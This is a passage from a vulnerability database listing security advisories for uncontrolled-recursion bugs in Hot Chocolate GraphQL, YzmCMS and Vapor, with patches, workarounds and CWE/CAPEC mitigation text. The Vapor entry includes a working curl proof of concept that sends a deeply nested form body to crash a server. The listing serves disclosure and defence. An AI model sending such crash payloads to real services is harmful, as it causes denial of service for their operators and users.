  "details": "### Impact\n\nHot Chocolate\u0027s `Utf8GraphQLParser` is a recursive descent parser with no recursion depth limit. A crafted GraphQL document with deeply nested selection sets, object values, list values, or list types can trigger a `StackOverflowException` on payloads as small as **40 KB**.\n\nBecause `StackOverflowException` is **uncatchable in .NET** (since .NET 2.0), the entire worker process is terminated immediately. All in-flight HTTP requests, background `IHostedService` tasks, and open WebSocket subscriptions on that worker are dropped. The orchestrator (Kubernetes, IIS, etc.) must restart the process.\n\nThis occurs **before any validation rules run** \u2014 `MaxExecutionDepth`, complexity analyzers, persisted query allow-lists, and custom `IDocumentValidatorRule` implementations cannot intercept the crash because `Utf8GraphQLParser.Parse` is invoked before validation. The existing `MaxAllowedFields=2048` limit does not help because the crashing payloads contain very few fields.\n\n**Severity:** Critical (9.1) \u2014 `CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H`\n\n### Patches\n\n- **v12 line:** Fixed in `12.22.7`\n- **v13 line:** Fixed in `13.9.16`\n- **v14 line:** Fixed in `14.3.1`\n- **v15 line:** Fixed in `15.1.14`\n\nThe fix adds a `MaxAllowedRecursionDepth` option to `ParserOptions` with a safe default, and enforces it across all recursive parser methods (`ParseSelectionSet`, `ParseValueLiteral`, `ParseObject`, `ParseList`, `ParseTypeReference`, etc.). When the limit is exceeded, a catchable `SyntaxException` is thrown instead of overflowing the stack.\n\n### Workarounds\n\nThere is no application-level workaround. `StackOverflowException` cannot be caught in .NET. The only mitigation is to upgrade to a patched version.\n\nOperators can reduce (but not eliminate) risk by limiting HTTP request body size at the reverse proxy or load balancer layer, though the smallest crashing payload (40 KB) is well below most default body size limits and is highly compressible (~few hundred bytes via gzip).\n\n### References\n\n- Fix for v15: https://github.com/ChilliCream/graphql-platform/pull/9528",
  "id": "GHSA-qr3m-xw4c-jqw3",
  "modified": "2026-04-24T20:51:04Z",
  "published": "2026-04-16T21:09:40Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/ChilliCream/graphql-platform/security/advisories/GHSA-qr3m-xw4c-jqw3"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-40324"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ChilliCream/graphql-platform/pull/9528"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ChilliCream/graphql-platform/pull/9530"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ChilliCream/graphql-platform/pull/9531"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ChilliCream/graphql-platform/commit/08c0caa42ca33c121bbed49d2db892e5bf6fb541"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ChilliCream/graphql-platform/commit/4cbaf67d366f800fc1e484bc5c06dfcf27b45023"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ChilliCream/graphql-platform/commit/b185eb276c9ee227bd44616ff113be7f01a66c69"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ChilliCream/graphql-platform/commit/b9271e6a500484c002fd528dcd34d1a9b445480f"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/ChilliCream/graphql-platform"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ChilliCream/graphql-platform/releases/tag/12.22.7"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ChilliCream/graphql-platform/releases/tag/13.9.16"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ChilliCream/graphql-platform/releases/tag/14.3.1"
    },
    {
      "type": "WEB",
      "url": "https://github.com/ChilliCream/graphql-platform/releases/tag/15.1.14"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "ChilliCream GraphQL Platform: Utf8GraphQLParser Stack Overflow via Deeply Nested GraphQL Documents"
}

GHSA-QRCQ-HR7G-X7GM

Vulnerability from github – Published: 2022-01-29 00:00 – Updated: 2022-02-04 00:00
VLAI
Details

The comment function in YzmCMS v6.3 was discovered as being able to be operated concurrently, allowing attackers to create an unusually large number of comments.

Show details on source website

{
  "affected": [],
  "aliases": [
    "CVE-2022-23889"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-674"
    ],
    "github_reviewed": false,
    "github_reviewed_at": null,
    "nvd_published_at": "2022-01-28T21:15:00Z",
    "severity": "MODERATE"
  },
  "details": "The comment function in YzmCMS v6.3 was discovered as being able to be operated concurrently, allowing attackers to create an unusually large number of comments.",
  "id": "GHSA-qrcq-hr7g-x7gm",
  "modified": "2022-02-04T00:00:37Z",
  "published": "2022-01-29T00:00:40Z",
  "references": [
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-23889"
    },
    {
      "type": "WEB",
      "url": "https://github.com/yzmcms/yzmcms/issues/61"
    }
  ],
  "schema_version": "1.4.0",
  "severity": []
}

GHSA-QVXG-WJXC-R4GG

Vulnerability from github – Published: 2023-06-07 16:11 – Updated: 2023-06-07 16:11
VLAI
Summary
Vapor vulnerable to denial of service in URLEncodedFormDecoder
Details

Vapor is an HTTP web framework for Swift. Vapor versions earlier than 4.61.1 are vulnerable to a denial of service in the URLEncodedFormDecoder.

Impact

When using automatic content decoding, e.g.

app.post("foo") { request -> String in
  let foo = try request.content.decode(Foo.self)
  return "\(foo)"
}

An attacker can craft a request body that can make the server crash with the following request:

curl -d "array[_0][0][array][_0][0][array]$(for f in $(seq 1100); do echo -n '[_0][0][array]'; done)[string][_0]=hello%20world" http://localhost:8080/foo

The issue is unbounded, attacker controlled stack growth which will at some point lead to a stack overflow.

Patches

Fixed in 4.61.1

Workarounds

If you don't need to decode Form URL Encoded data, you can disable the ContentConfiguration so it won't be used. E.g. in configure.swift

var contentConfig = ContentConfiguration()
contentConfig.use(encoder: JSONEncoder.custom(dates: .iso8601), for: .json)
contentConfig.use(decoder: JSONDecoder.custom(dates: .iso8601), for: .json)
contentConfig.use(encoder: JSONEncoder.custom(dates: .iso8601), for: .jsonAPI)
contentConfig.use(decoder: JSONDecoder.custom(dates: .iso8601), for: .jsonAPI)
ContentConfiguration.global = contentConfig

For more information

If you have any questions or comments about this advisory: * Open an issue in the Vapor repo * Ask in Vapor Discord

Show details on source website

{
  "affected": [
    {
      "package": {
        "ecosystem": "SwiftURL",
        "name": "github.com/vapor/vapor"
      },
      "ranges": [
        {
          "events": [
            {
              "introduced": "0"
            },
            {
              "fixed": "4.61.1"
            }
          ],
          "type": "ECOSYSTEM"
        }
      ]
    }
  ],
  "aliases": [
    "CVE-2022-31019"
  ],
  "database_specific": {
    "cwe_ids": [
      "CWE-120",
      "CWE-121",
      "CWE-674"
    ],
    "github_reviewed": true,
    "github_reviewed_at": "2023-06-07T16:11:16Z",
    "nvd_published_at": "2022-06-09T13:15:00Z",
    "severity": "HIGH"
  },
  "details": "Vapor is an HTTP web framework for Swift. Vapor versions earlier than 4.61.1 are vulnerable to a denial of service in the URLEncodedFormDecoder.\n\n### Impact\nWhen using automatic content decoding, e.g. \n\n```swift\napp.post(\"foo\") { request -\u003e String in\n  let foo = try request.content.decode(Foo.self)\n  return \"\\(foo)\"\n}\n```\n\nAn attacker can craft a request body that can make the server crash with the following request:\n\n```\ncurl -d \"array[_0][0][array][_0][0][array]$(for f in $(seq 1100); do echo -n \u0027[_0][0][array]\u0027; done)[string][_0]=hello%20world\" http://localhost:8080/foo\n```\n\nThe issue is unbounded, attacker controlled stack growth which will at some point lead to a stack overflow.\n\n### Patches\nFixed in 4.61.1\n\n### Workarounds\nIf you don\u0027t need to decode Form URL Encoded data, you can disable the `ContentConfiguration` so it won\u0027t be used. E.g. in **configure.swift**\n\n```swift\nvar contentConfig = ContentConfiguration()\ncontentConfig.use(encoder: JSONEncoder.custom(dates: .iso8601), for: .json)\ncontentConfig.use(decoder: JSONDecoder.custom(dates: .iso8601), for: .json)\ncontentConfig.use(encoder: JSONEncoder.custom(dates: .iso8601), for: .jsonAPI)\ncontentConfig.use(decoder: JSONDecoder.custom(dates: .iso8601), for: .jsonAPI)\nContentConfiguration.global = contentConfig\n```\n\n### For more information\nIf you have any questions or comments about this advisory:\n* Open an issue in [the Vapor repo](https://github.com/vapor/vapor)\n* Ask in [Vapor Discord](http://vapor.team)",
  "id": "GHSA-qvxg-wjxc-r4gg",
  "modified": "2023-06-07T16:11:16Z",
  "published": "2023-06-07T16:11:16Z",
  "references": [
    {
      "type": "WEB",
      "url": "https://github.com/vapor/vapor/security/advisories/GHSA-qvxg-wjxc-r4gg"
    },
    {
      "type": "ADVISORY",
      "url": "https://nvd.nist.gov/vuln/detail/CVE-2022-31019"
    },
    {
      "type": "WEB",
      "url": "https://github.com/vapor/vapor/commit/6c63226a4ab82ce53730eb1afb9ca63866fcf033"
    },
    {
      "type": "PACKAGE",
      "url": "https://github.com/vapor/vapor"
    }
  ],
  "schema_version": "1.4.0",
  "severity": [
    {
      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
      "type": "CVSS_V3"
    }
  ],
  "summary": "Vapor vulnerable to denial of service in URLEncodedFormDecoder"
}

Mitigation
Implementation

Ensure that an end condition will be reached under all logic conditions. The end condition may include checking against the depth of recursion and exiting with an error if the recursion goes too deep. The complexity of the end condition contributes to the effectiveness of this action.

Mitigation
Implementation

Increase the stack size.

CAPEC-230: Serialized Data with Nested Payloads

Applications often need to transform data in and out of a data format (e.g., XML and YAML) by using a parser. It may be possible for an adversary to inject data that may have an adverse effect on the parser when it is being processed. Many data format languages allow the definition of macro-like structures that can be used to simplify the creation of complex structures. By nesting these structures, causing the data to be repeatedly substituted, an adversary can cause the parser to consume more resources while processing, causing excessive memory consumption and CPU utilization.

CAPEC-231: Oversized Serialized Data Payloads

An adversary injects oversized serialized data payloads into a parser during data processing to produce adverse effects upon the parser such as exhausting system resources and arbitrary code execution.